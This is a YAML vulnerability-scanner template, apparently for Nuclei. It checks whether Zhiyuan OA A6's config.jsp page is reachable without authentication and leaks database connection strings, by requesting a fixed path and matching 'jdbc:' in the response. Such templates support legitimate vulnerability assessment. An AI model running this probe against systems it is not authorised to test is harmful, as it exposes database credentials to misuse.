id: zhiyuanOA-configjsp-info-leak

info:
  name: 致远OA A6 config.jsp 敏感信息泄漏漏洞
  author: cnaq
  severity: medium  
  description: 致远OA A6 config.jsp页面可未授权访问，导致敏感信息泄漏漏洞，攻击者通过漏洞可以获取服务器中的敏感信息
  reference: 
    - http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E8%BF%9COA/%E8%87%B4%E8%BF%9COA%20A6%20config.jsp%20%E6%95%8F%E6%84%9F%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.html
  tags: zhiyuanOA,info,leak

requests:
  - raw:
      - |+
        GET /yyoa/ext/trafaxserver/SystemManage/config.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
          
      - type: word
        part: body
        words:
          - 'jdbc:'
